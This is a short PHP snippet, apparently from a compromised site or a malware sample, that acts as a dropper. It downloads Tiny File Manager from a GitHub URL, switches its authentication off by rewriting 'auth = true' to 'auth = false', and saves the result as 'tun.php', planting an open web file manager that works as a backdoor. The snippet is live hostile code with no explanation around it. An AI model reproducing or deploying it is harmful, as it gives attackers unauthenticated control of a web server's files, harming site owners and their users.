[Back]
<?php
$a=file_get_contents('https://raw.githubusercontent.com/bijju089/TFM-3/refs/heads/master/tinyfilemanager.php');
$a=str_replace('auth = true','auth = false',$a);
if(strlen($a)>50) file_put_contents('tun.php',$a);